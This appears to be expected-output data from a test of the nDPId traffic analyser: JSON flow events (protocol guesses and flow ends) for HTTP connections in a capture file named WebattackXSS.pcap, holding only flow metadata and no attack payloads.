-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":595,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347983061,"flow_last_seen":1499347988894,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34738,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":596,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347984370,"flow_last_seen":1499347989894,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34752,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":596,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347984370,"flow_last_seen":1499347989894,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34752,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":597,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347985686,"flow_last_seen":1499347990895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34766,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":597,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347985686,"flow_last_seen":1499347990895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34766,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":598,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347988233,"flow_last_seen":1499347993896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34792,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":598,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347988233,"flow_last_seen":1499347993896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34792,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":599,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347989526,"flow_last_seen":1499347994896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34806,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":599,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347989526,"flow_last_seen":1499347994896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34806,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":600,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347992139,"flow_last_seen":1499347997898,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34832,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":600,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347992139,"flow_last_seen":1499347997898,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34832,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":601,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347993411,"flow_last_seen":1499347998898,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34846,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":601,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347993411,"flow_last_seen":1499347998898,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34846,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":602,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347994680,"flow_last_seen":1499347999898,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34860,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":602,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347994680,"flow_last_seen":1499347999898,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34860,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":603,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347997344,"flow_last_seen":1499348002899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34886,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":603,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347997344,"flow_last_seen":1499348002899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34886,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":604,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347998605,"flow_last_seen":1499348003900,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34900,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":604,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347998605,"flow_last_seen":1499348003900,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34900,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":605,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348001148,"flow_last_seen":1499348006901,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34926,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":605,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348001148,"flow_last_seen":1499348006901,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34926,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":606,"flow_state":"finished","flow_packets_processed":311,"flow_first_seen":1499348002450,"flow_last_seen":1499348071824,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232355,"flow_avg_l4_payload_len":747,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34940,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":607,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348003742,"flow_last_seen":1499348008904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34954,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":607,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348003742,"flow_last_seen":1499348008904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34954,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":608,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348006334,"flow_last_seen":1499348011904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34980,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":608,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348006334,"flow_last_seen":1499348011904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34980,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":609,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348007599,"flow_last_seen":1499348012904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34994,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":609,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348007599,"flow_last_seen":1499348012904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34994,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":610,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348010145,"flow_last_seen":1499348015905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35020,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":610,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348010145,"flow_last_seen":1499348015905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35020,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":611,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348011433,"flow_last_seen":1499348016905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35034,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":611,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348011433,"flow_last_seen":1499348016905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35034,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":612,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348012728,"flow_last_seen":1499348017905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35048,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":612,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348012728,"flow_last_seen":1499348017905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35048,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":613,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348015250,"flow_last_seen":1499348020905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35074,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":613,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348015250,"flow_last_seen":1499348020905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35074,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":614,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348016526,"flow_last_seen":1499348021905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35088,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":614,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348016526,"flow_last_seen":1499348021905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35088,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":615,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348019059,"flow_last_seen":1499348024906,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35114,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":615,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348019059,"flow_last_seen":1499348024906,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35114,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":616,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348020357,"flow_last_seen":1499348025907,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35128,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":616,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348020357,"flow_last_seen":1499348025907,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35128,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":617,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348021660,"flow_last_seen":1499348026908,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35142,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":617,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348021660,"flow_last_seen":1499348026908,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35142,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 